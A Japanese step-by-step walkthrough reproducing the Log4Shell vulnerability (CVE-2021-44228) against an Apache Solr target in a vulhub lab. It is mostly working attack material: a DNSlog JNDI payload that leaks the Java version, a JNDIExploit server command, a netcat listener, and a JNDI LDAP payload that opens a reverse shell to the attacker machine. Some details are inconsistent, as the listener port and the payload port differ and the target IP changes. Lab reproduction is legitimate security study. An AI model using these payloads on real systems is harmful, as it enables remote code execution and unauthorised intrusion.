環境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali システム:攻撃マシンとしてポート情報をリッスンするために nc が必要
ローカルマシン:中継マシン
CentOS:ターゲットマシン
アドレス情報:
ターゲットマシンの IP:192.168.1.4:8983
ローカルマシンの IP:192.168.1.2
攻撃マシン:192.168.91.131
ターゲット環境を開く
DNS ドメインをリクエストする
http://dnslog.cn/
ドメイン:
gswq4u.dnslog.cn
hackbar を開き、まず loadURL をクリックする
提供されたアドレスをコピーする
後ろのドメインを先ほど申請したものに変更する
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
実行をクリックすると、以下のページが表示される
ここでフィードバックを受け取ります
今、JNDIExploit-1.2 を開きます
コマンドを入力します
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i ローカルマシンの IP
そして、攻撃マシンでポートをリッスンします
コマンド:
nc -lvp 4444
hackbar で以下のコマンドを構築します
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
Execute をクリックする
リッスンしているポートからシェルが返ってくることがわかる
ここで再現が完了しました